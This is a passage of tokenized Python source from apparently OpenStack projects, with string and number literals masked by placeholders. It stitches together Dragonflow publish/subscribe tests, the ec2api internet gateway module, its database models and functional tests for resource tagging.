) <EOL> local_event_num = ns . events_num <EOL> update = { '<STR_LIT:port>' : { '<STR_LIT:name>' : '<STR_LIT:test>' } } <EOL> for i in six . moves . range ( <NUM_LIT:100> ) : <EOL> name = "<STR_LIT>" % i <EOL> update [ '<STR_LIT:port>' ] [ '<STR_LIT:name>' ] = name <EOL> self . neutron . update_port ( port_id , update ) <EOL> eventlet . sleep ( <NUM_LIT:0> ) <EOL> eventlet . sleep ( <NUM_LIT:1> ) <EOL> self . assertGreaterEqual ( ns . events_num , local_event_num + <NUM_LIT:100> ) <EOL> local_event_num = ns . events_num <EOL> port . close ( ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertNotEqual ( local_event_num , ns . events_num ) <EOL> local_event_num = ns . events_num <EOL> network . close ( ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertNotEqual ( local_event_num , events_num ) <EOL> subscriber . stop ( ) <EOL> self . assertFalse ( network . exists ( ) ) <EOL> def test_pub_sub_event_number_diffrent_port ( self ) : <EOL> if not self . do_test : <EOL> return <EOL> ns = Namespace ( ) <EOL> ns . events_num = <NUM_LIT:0> <EOL> ns . events_action = None <EOL> def _db_change_callback ( table , key , action , value , topic ) : <EOL> if '<STR_LIT>' == key : <EOL> ns . events_num += <NUM_LIT:1> <EOL> ns . events_action = action <EOL> publisher = get_publisher ( ) <EOL> subscriber = get_subscriber ( _db_change_callback ) <EOL> eventlet . sleep ( <NUM_LIT:2> ) <EOL> local_events_num = ns . events_num <EOL> action = "<STR_LIT>" <EOL> update = DbUpdate ( '<STR_LIT:info>' , '<STR_LIT>' , action , "<STR_LIT>" ) <EOL> publisher . send_event ( update ) <EOL> eventlet . sleep ( <NUM_LIT:1> ) <EOL> self . assertEqual ( local_events_num + <NUM_LIT:1> , ns . events_num ) <EOL> self . assertEqual ( ns . events_action , action ) <EOL> local_events_num = ns . events_num <EOL> for i in six . moves . range ( <NUM_LIT:100> ) : <EOL> publisher . send_event ( update ) <EOL> eventlet . sleep ( <NUM_LIT> ) <EOL> eventlet . sleep ( <NUM_LIT:1> ) <EOL> self . assertEqual ( local_events_num + <NUM_LIT:100> , ns . events_num ) <EOL> subscriber . stop ( ) <EOL> def test_pub_sub_add_topic ( self ) : <EOL> if not self . do_test : <EOL> return <EOL> self . events_num_t = <NUM_LIT:0> <EOL> self . events_action_t = None <EOL> def _db_change_callback_topic ( table , key , action , value , topic ) : <EOL> if '<STR_LIT>' == key : <EOL> self . events_num_t += <NUM_LIT:1> <EOL> self . events_action_t = action <EOL> publisher = get_publisher ( ) <EOL> subscriber = get_subscriber ( _db_change_callback_topic ) <EOL> eventlet . sleep ( <NUM_LIT:2> ) <EOL> topic = "<STR_LIT>" <EOL> subscriber . register_topic ( topic ) <EOL> eventlet . sleep ( <NUM_LIT:0.5> ) <EOL> local_events_num = self . events_num_t <EOL> action = "<STR_LIT>" <EOL> update = DbUpdate ( <EOL> '<STR_LIT:info>' , <EOL> '<STR_LIT>' , <EOL> action , <EOL> "<STR_LIT>" <EOL> ) <EOL> publisher . send_event ( update , topic ) <EOL> eventlet . sleep ( <NUM_LIT:1> ) <EOL> self . assertEqual ( self . events_action_t , action ) <EOL> self . assertEqual ( local_events_num + <NUM_LIT:1> , self . events_num_t ) <EOL> no_topic_action = '<STR_LIT>' <EOL> other_topic = "<STR_LIT>" <EOL> self . events_action_t = None <EOL> update = DbUpdate ( '<STR_LIT:info>' , None , no_topic_action , "<STR_LIT>" ) <EOL> publisher . send_event ( update , other_topic ) <EOL> eventlet . sleep ( <NUM_LIT:1> ) <EOL> self . assertEqual ( self . events_action_t , None ) <EOL> self . assertNotEqual ( local_events_num + <NUM_LIT:2> , self . events_num_t ) <EOL> subscriber . unregister_topic ( topic ) <EOL> publisher . send_event ( update , topic ) <EOL> self . assertEqual ( self . events_action_t , None ) <EOL> subscriber . stop ( ) <EOL> class TestMultiprocPubSub ( test_base . DFTestBase ) : <EOL> def setUp ( self ) : <EOL> super ( TestMultiprocPubSub , self ) . setUp ( ) <EOL> self . do_test = cfg . CONF . df . enable_df_pub_sub <EOL> self . key = '<STR_LIT>' . format ( random . random ( ) ) <EOL> self . event = DbUpdate ( <EOL> '<STR_LIT:info>' , <EOL> None , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> topic = SEND_ALL_TOPIC , <EOL> ) <EOL> self . subscriber = None <EOL> def tearDown ( self ) : <EOL> if self . subscriber : <EOL> self . subscriber . stop ( ) <EOL> super ( TestMultiprocPubSub , self ) . tearDown ( ) <EOL> def _verify_event ( self , table , key , action , value , topic ) : <EOL> self . assertEqual ( self . event . table , table ) <EOL> self . assertEqual ( self . event . key , key ) <EOL> self . assertEqual ( self . event . action , action ) <EOL> self . assertEqual ( self . event . topic , topic ) <EOL> self . event_received = True <EOL> def test_multiproc_pub_sub ( self ) : <EOL> if not self . do_test : <EOL> return <EOL> self . event_received = False <EOL> cfg . CONF . df . publisher_multiproc_socket = '<STR_LIT>' <EOL> pub_sub_driver = df_utils . load_driver ( <EOL> cfg . CONF . df . pub_sub_multiproc_driver , <EOL> df_utils . DF_PUBSUB_DRIVER_NAMESPACE ) <EOL> publisher = pub_sub_driver . get_publisher ( ) <EOL> publisher . initialize ( ) <EOL> self . subscriber = pub_sub_driver . get_subscriber ( ) <EOL> self . subscriber . initialize ( self . _verify_event ) <EOL> self . subscriber . daemonize ( ) <EOL> publisher . send_event ( self . event ) <EOL> wait_until_true ( lambda : self . event_received ) <EOL> self . subscriber . stop ( ) <EOL> self . subscriber = None <EOL> class TestDbTableMonitors ( test_base . DFTestBase ) : <EOL> def setUp ( self ) : <EOL> super ( TestDbTableMonitors , self ) . setUp ( ) <EOL> self . events_num = <NUM_LIT:0> <EOL> enable_df_pub_sub = cfg . CONF . df . enable_df_pub_sub <EOL> self . do_test = enable_df_pub_sub <EOL> if not self . do_test : <EOL> return <EOL> self . namespace = Namespace ( ) <EOL> self . namespace . events = [ ] <EOL> self . publisher = get_publisher ( ) <EOL> self . subscriber = get_subscriber ( self . _db_change_callback ) <EOL> self . monitor = self . _create_monitor ( '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> if self . do_test : <EOL> self . monitor . stop ( ) <EOL> self . subscriber . stop ( ) <EOL> super ( TestDbTableMonitors , self ) . tearDown ( ) <EOL> def _db_change_callback ( self , table , key , action , value , topic ) : <EOL> self . namespace . events . append ( { <EOL> '<STR_LIT>' : table , <EOL> '<STR_LIT:key>' : key , <EOL> '<STR_LIT:action>' : action , <EOL> '<STR_LIT:value>' : value , <EOL> } ) <EOL> def _create_monitor ( self , table_name ) : <EOL> table_monitor = TableMonitor ( <EOL> table_name , <EOL> self . nb_api . driver , <EOL> self . publisher , <EOL> <NUM_LIT:1> , <EOL> ) <EOL> table_monitor . daemonize ( ) <EOL> return table_monitor <EOL> def test_operations ( self ) : <EOL> if not self . do_test : <EOL> return <EOL> expected_event = { <EOL> '<STR_LIT>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:key>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:action>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:value>' : None , <EOL> } <EOL> self . assertNotIn ( expected_event , self . namespace . events ) <EOL> self . nb_api . driver . create_key ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> jsonutils . dumps ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:data>' : '<STR_LIT>' } ) ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertIn ( expected_event , self . namespace . events ) <EOL> expected_event = { <EOL> '<STR_LIT>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:key>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:action>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:value>' : None , <EOL> } <EOL> self . assertNotIn ( expected_event , self . namespace . events ) <EOL> self . nb_api . driver . set_key ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> jsonutils . dumps ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:data>' : '<STR_LIT>' } ) ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertIn ( expected_event , self . namespace . events ) <EOL> expected_event = { <EOL> '<STR_LIT>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:key>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:action>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:value>' : None , <EOL> } <EOL> self . assertNotIn ( expected_event , self . namespace . events ) <EOL> self . nb_api . driver . delete_key ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertIn ( expected_event , self . namespace . events ) </s>
<s> """<STR_LIT>""" <EOL> from neutronclient . common import exceptions as neutron_exception <EOL> from oslo_log import log as logging <EOL> from ec2api . api import common <EOL> from ec2api . api import ec2utils <EOL> from ec2api import clients <EOL> from ec2api . db import api as db_api <EOL> from ec2api import exception <EOL> from ec2api . i18n import _ <EOL> LOG = logging . getLogger ( __name__ ) <EOL> """<STR_LIT>""" <EOL> Validator = common . Validator <EOL> def create_internet_gateway ( context ) : <EOL> igw = db_api . add_item ( context , '<STR_LIT>' , { } ) <EOL> return { '<STR_LIT>' : _format_internet_gateway ( igw ) } <EOL> def attach_internet_gateway ( context , internet_gateway_id , vpc_id ) : <EOL> igw = ec2utils . get_db_item ( context , internet_gateway_id ) <EOL> if igw . get ( '<STR_LIT>' ) : <EOL> msg_params = { '<STR_LIT>' : igw [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : igw [ '<STR_LIT>' ] } <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % msg_params <EOL> raise exception . ResourceAlreadyAssociated ( msg ) <EOL> vpc = ec2utils . get_db_item ( context , vpc_id ) <EOL> if ec2utils . get_attached_gateway ( context , vpc [ '<STR_LIT:id>' ] , '<STR_LIT>' ) : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % { '<STR_LIT>' : vpc [ '<STR_LIT:id>' ] } <EOL> raise exception . InvalidParameterValue ( msg ) <EOL> external_network_id = None <EOL> if not ec2utils . get_attached_gateway ( context , vpc [ '<STR_LIT:id>' ] , '<STR_LIT>' ) : <EOL> external_network_id = ec2utils . get_os_public_network ( context ) [ '<STR_LIT:id>' ] <EOL> neutron = clients . neutron ( context ) <EOL> with common . OnCrashCleaner ( ) as cleaner : <EOL> _attach_internet_gateway_item ( context , igw , vpc [ '<STR_LIT:id>' ] ) <EOL> cleaner . addCleanup ( _detach_internet_gateway_item , context , igw ) <EOL> if external_network_id : <EOL> neutron . add_gateway_router ( vpc [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : external_network_id } ) <EOL> return True <EOL> def detach_internet_gateway ( context , internet_gateway_id , vpc_id ) : <EOL> igw = ec2utils . get_db_item ( context , internet_gateway_id ) <EOL> vpc = ec2utils . get_db_item ( context , vpc_id ) <EOL> if igw . get ( '<STR_LIT>' ) != vpc [ '<STR_LIT:id>' ] : <EOL> raise exception . GatewayNotAttached ( gw_id = igw [ '<STR_LIT:id>' ] , <EOL> vpc_id = vpc [ '<STR_LIT:id>' ] ) <EOL> remove_os_gateway_router = ( <EOL> ec2utils . get_attached_gateway ( context , vpc_id , '<STR_LIT>' ) is None ) <EOL> neutron = clients . neutron ( context ) <EOL> with common . OnCrashCleaner ( ) as cleaner : <EOL> _detach_internet_gateway_item ( context , igw ) <EOL> cleaner . addCleanup ( _attach_internet_gateway_item , <EOL> context , igw , vpc [ '<STR_LIT:id>' ] ) <EOL> if remove_os_gateway_router : <EOL> try : <EOL> neutron . remove_gateway_router ( vpc [ '<STR_LIT>' ] ) <EOL> except neutron_exception . NotFound : <EOL> pass <EOL> return True <EOL> def delete_internet_gateway ( context , internet_gateway_id ) : <EOL> igw = ec2utils . get_db_item ( context , internet_gateway_id ) <EOL> if igw . get ( '<STR_LIT>' ) : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % { '<STR_LIT>' : igw [ '<STR_LIT:id>' ] } <EOL> raise exception . DependencyViolation ( msg ) <EOL> db_api . delete_item ( context , igw [ '<STR_LIT:id>' ] ) <EOL> return True <EOL> class InternetGatewayDescriber ( common . TaggableItemsDescriber , <EOL> common . NonOpenstackItemsDescriber ) : <EOL> KIND = '<STR_LIT>' <EOL> FILTER_MAP = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT:state>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } <EOL> def format ( self , igw ) : <EOL> return _format_internet_gateway ( igw ) <EOL> def describe_internet_gateways ( context , internet_gateway_id = None , <EOL> filter = None ) : <EOL> formatted_igws = InternetGatewayDescriber ( ) . describe ( <EOL> context , ids = internet_gateway_id , filter = filter ) <EOL> return { '<STR_LIT>' : formatted_igws } <EOL> def _format_internet_gateway ( igw ) : <EOL> ec2_igw = { '<STR_LIT>' : igw [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : [ ] } <EOL> if igw . get ( '<STR_LIT>' ) : <EOL> attachment_state = '<STR_LIT>' <EOL> attachment = { '<STR_LIT>' : igw [ '<STR_LIT>' ] , <EOL> '<STR_LIT:state>' : attachment_state } <EOL> ec2_igw [ '<STR_LIT>' ] . append ( attachment ) <EOL> return ec2_igw <EOL> def _attach_internet_gateway_item ( context , igw , vpc_id ) : <EOL> igw [ '<STR_LIT>' ] = vpc_id <EOL> db_api . update_item ( context , igw ) <EOL> def _detach_internet_gateway_item ( context , igw ) : <EOL> igw [ '<STR_LIT>' ] = None <EOL> db_api . update_item ( context , igw ) </s>
<s> """<STR_LIT>""" <EOL> from oslo_db . sqlalchemy import models <EOL> from sqlalchemy . ext . declarative import declarative_base <EOL> from sqlalchemy import Column , PrimaryKeyConstraint , String , Text <EOL> from sqlalchemy import UniqueConstraint <EOL> BASE = declarative_base ( ) <EOL> ITEMS_OS_ID_INDEX_NAME = '<STR_LIT>' <EOL> class EC2Base ( models . ModelBase ) : <EOL> metadata = None <EOL> def save ( self , session = None ) : <EOL> from ec2api . db . sqlalchemy import api <EOL> if session is None : <EOL> session = api . get_session ( ) <EOL> super ( EC2Base , self ) . save ( session = session ) <EOL> class Item ( BASE , EC2Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( <EOL> PrimaryKeyConstraint ( '<STR_LIT:id>' ) , <EOL> UniqueConstraint ( '<STR_LIT>' , name = ITEMS_OS_ID_INDEX_NAME ) , <EOL> ) <EOL> id = Column ( String ( length = <NUM_LIT:30> ) ) <EOL> project_id = Column ( String ( length = <NUM_LIT:64> ) ) <EOL> vpc_id = Column ( String ( length = <NUM_LIT:12> ) ) <EOL> os_id = Column ( String ( length = <NUM_LIT> ) ) <EOL> data = Column ( Text ( ) ) <EOL> class Tag ( BASE , EC2Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( <EOL> PrimaryKeyConstraint ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:key>' ) , <EOL> ) <EOL> project_id = Column ( String ( length = <NUM_LIT:64> ) ) <EOL> item_id = Column ( String ( length = <NUM_LIT:30> ) ) <EOL> key = Column ( String ( length = <NUM_LIT> ) ) <EOL> value = Column ( String ( length = <NUM_LIT:255> ) ) </s>
<s> import time <EOL> from tempest . lib . common . utils import data_utils <EOL> import testtools <EOL> from ec2api . tests . functional import base <EOL> from ec2api . tests . functional import config <EOL> CONF = config . CONF <EOL> class TagTest ( base . EC2TestCase ) : <EOL> @ classmethod <EOL> @ base . safe_setup <EOL> def setUpClass ( cls ) : <EOL> super ( TagTest , cls ) . setUpClass ( ) <EOL> cls . zone = CONF . aws . aws_zone <EOL> data = cls . client . create_volume ( <EOL> Size = <NUM_LIT:1> , AvailabilityZone = cls . zone ) <EOL> cls . volume_id = data [ '<STR_LIT>' ] <EOL> cls . addResourceCleanUpStatic ( cls . client . delete_volume , <EOL> VolumeId = cls . volume_id ) <EOL> cls . get_volume_waiter ( ) . wait_available ( cls . volume_id ) <EOL> def test_create_get_delete_tag ( self ) : <EOL> tag_key = data_utils . rand_name ( '<STR_LIT>' ) <EOL> self . client . create_tags ( Resources = [ self . volume_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key , '<STR_LIT>' : '<STR_LIT>' } ] ) <EOL> self . addResourceCleanUp ( self . client . delete_tags , <EOL> Resources = [ self . volume_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key } ] ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ self . volume_id ] } ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . client . delete_tags ( Resources = [ self . volume_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key } ] ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ self . volume_id ] } ] ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( data [ '<STR_LIT>' ] ) ) <EOL> def test_describe_tags ( self ) : <EOL> tag_key = data_utils . rand_name ( '<STR_LIT>' ) <EOL> self . client . create_tags ( Resources = [ self . volume_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key , '<STR_LIT>' : '<STR_LIT>' } ] ) <EOL> self . addResourceCleanUp ( self . client . delete_tags , <EOL> Resources = [ self . volume_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key } ] ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ self . volume_id ] } ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> tag = data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , tag . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( self . volume_id , tag . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( tag_key , tag . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( '<STR_LIT>' , tag . get ( '<STR_LIT>' ) ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ self . volume_id ] } , <EOL> { '<STR_LIT:Name>' : '<STR_LIT:key>' , '<STR_LIT>' : [ tag_key ] } ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT:key>' , '<STR_LIT>' : [ tag_key ] } ] ) <EOL> self . assertIn ( tag_key , [ k . get ( '<STR_LIT>' ) for k in data [ '<STR_LIT>' ] ] ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT:value>' , '<STR_LIT>' : [ '<STR_LIT>' ] } ] ) <EOL> self . assertIn ( '<STR_LIT>' , [ k . get ( '<STR_LIT>' ) for k in data [ '<STR_LIT>' ] ] ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT:key>' , '<STR_LIT>' : [ '<STR_LIT>' ] } ] ) <EOL> items = [ k . get ( '<STR_LIT>' ) for k in data [ '<STR_LIT>' ] ] <EOL> self . assertNotIn ( tag_key , items ) <EOL> self . assertNotIn ( '<STR_LIT>' , items ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } ] ) <EOL> self . assertIn ( tag_key , [ k . get ( '<STR_LIT>' ) for k in data [ '<STR_LIT>' ] ] ) <EOL> self . client . delete_tags ( Resources = [ self . volume_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key } ] ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ self . volume_id ] } ] ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( data [ '<STR_LIT>' ] ) ) <EOL> def _test_tag_resource ( self , resource_id , res_type , describe_func ) : <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ resource_id ] } ] ) <EOL> origin_count = len ( data [ '<STR_LIT>' ] ) <EOL> tag_key = data_utils . rand_name ( '<STR_LIT>' ) <EOL> data = self . client . create_tags ( Resources = [ resource_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key , '<STR_LIT>' : '<STR_LIT>' } ] ) <EOL> self . addResourceCleanUp ( self . client . delete_tags , <EOL> Resources = [ resource_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key } ] ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ resource_id ] } ] ) <EOL> self . assertEqual ( origin_count + <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ res_type ] } ] ) <EOL> self . assertIn ( tag_key , [ k . get ( '<STR_LIT>' ) for k in data [ '<STR_LIT>' ] ] ) <EOL> describe_func ( Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ tag_key ] } ] ) <EOL> self . client . delete_tags ( Resources = [ resource_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key } ] ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ resource_id ] } ] ) <EOL> self . assertEqual ( origin_count , len ( data [ '<STR_LIT>' ] ) ) <EOL> def _test_tag_resource_negative ( self , resource_id ) : <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ resource_id ] } ] ) <EOL> self . assertEmpty ( data [ '<STR_LIT>' ] ) <EOL> def _rollback ( fn_data ) : <EOL> self . client . delete_tags ( Resources = [ resource_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key } ] ) <EOL> tag_key = data_utils . rand_name ( '<STR_LIT>' ) <EOL> self . assertRaises ( '<STR_LIT>' , <EOL> self . client . create_tags , rollback_fn = _rollback , <EOL> Resources = [ resource_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key , '<STR_LIT>' : '<STR_LIT>' } ] ) <EOL> def test_tag_image ( self ) : <EOL> image_id = CONF . aws . ebs_image_id <EOL> if not image_id : <EOL> image_id = CONF . aws . image_id <EOL> if not image_id : <EOL> raise self . skipException ( '<STR_LIT>' ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_images ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( image_id , data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( image_id , '<STR_LIT:image>' , describe_func ) <EOL> data = self . client . describe_images ( ImageIds = [ image_id ] ) <EOL> image = data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> if '<STR_LIT>' in image : <EOL> image_id = image [ '<STR_LIT>' ] <EOL> self . _test_tag_resource ( image_id , '<STR_LIT:image>' , describe_func ) <EOL> if '<STR_LIT>' in image : <EOL> image_id = image [ '<STR_LIT>' ] <EOL> self . _test_tag_resource ( image_id , '<STR_LIT:image>' , describe_func ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_dhcp_options ( self ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> ] , <EOL> } <EOL> data = self . client . create_dhcp_options ( * [ ] , ** kwargs ) <EOL> options = data [ '<STR_LIT>' ] <EOL> res_id = options [ '<STR_LIT>' ] <EOL> res_clean = self . addResourceCleanUp ( self . client . delete_dhcp_options , <EOL> DhcpOptionsId = res_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_dhcp_options ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( res_id , data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( res_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_dhcp_options ( DhcpOptionsId = res_id ) <EOL> self . cancelResourceCleanUp ( res_clean ) <EOL> def test_tag_volume ( self ) : <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_volumes ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( self . volume_id , data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( self . volume_id , '<STR_LIT>' , describe_func ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_address ( self ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> data = self . client . allocate_address ( * [ ] , ** kwargs ) <EOL> res_id = data [ '<STR_LIT>' ] <EOL> res_clean = self . addResourceCleanUp ( self . client . release_address , <EOL> AllocationId = res_id ) <EOL> self . assertEqual ( '<STR_LIT>' , data [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource_negative ( res_id ) <EOL> self . client . release_address ( AllocationId = res_id ) <EOL> self . cancelResourceCleanUp ( res_clean ) <EOL> @ testtools . skipUnless ( CONF . aws . image_id , "<STR_LIT>" ) <EOL> def test_tag_instance ( self ) : <EOL> instance_id = self . run_instance ( ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_instances ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( instance_id , <EOL> data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( instance_id , '<STR_LIT>' , describe_func ) <EOL> self . client . terminate_instances ( InstanceIds = [ instance_id ] ) <EOL> self . get_instance_waiter ( ) . wait_delete ( instance_id ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_internet_gateway ( self ) : <EOL> data = self . client . create_internet_gateway ( ) <EOL> gw_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> res_clean = self . addResourceCleanUp ( <EOL> self . client . delete_internet_gateway , InternetGatewayId = gw_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_internet_gateways ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( gw_id , <EOL> data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( gw_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_internet_gateway ( InternetGatewayId = gw_id ) <EOL> self . cancelResourceCleanUp ( res_clean ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_network_interface ( self ) : <EOL> cidr = '<STR_LIT>' <EOL> data = self . client . create_vpc ( CidrBlock = cidr ) <EOL> vpc_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> dv_clean = self . addResourceCleanUp ( <EOL> self . client . delete_vpc , VpcId = vpc_id ) <EOL> cidr = '<STR_LIT>' <EOL> data = self . client . create_subnet ( VpcId = vpc_id , <EOL> CidrBlock = cidr ) <EOL> subnet_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> subnet_clean = self . addResourceCleanUp ( self . client . delete_subnet , <EOL> SubnetId = subnet_id ) <EOL> data = self . client . create_network_interface ( SubnetId = subnet_id , <EOL> Description = data_utils . rand_name ( '<STR_LIT>' ) ) <EOL> ni_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> res_clean = self . addResourceCleanUp ( <EOL> self . client . delete_network_interface , NetworkInterfaceId = ni_id ) <EOL> self . get_network_interface_waiter ( ) . wait_available ( ni_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_network_interfaces ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( ni_id , <EOL> data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( ni_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_network_interface ( NetworkInterfaceId = ni_id ) <EOL> self . cancelResourceCleanUp ( res_clean ) <EOL> self . get_network_interface_waiter ( ) . wait_delete ( ni_id ) <EOL> self . client . delete_subnet ( SubnetId 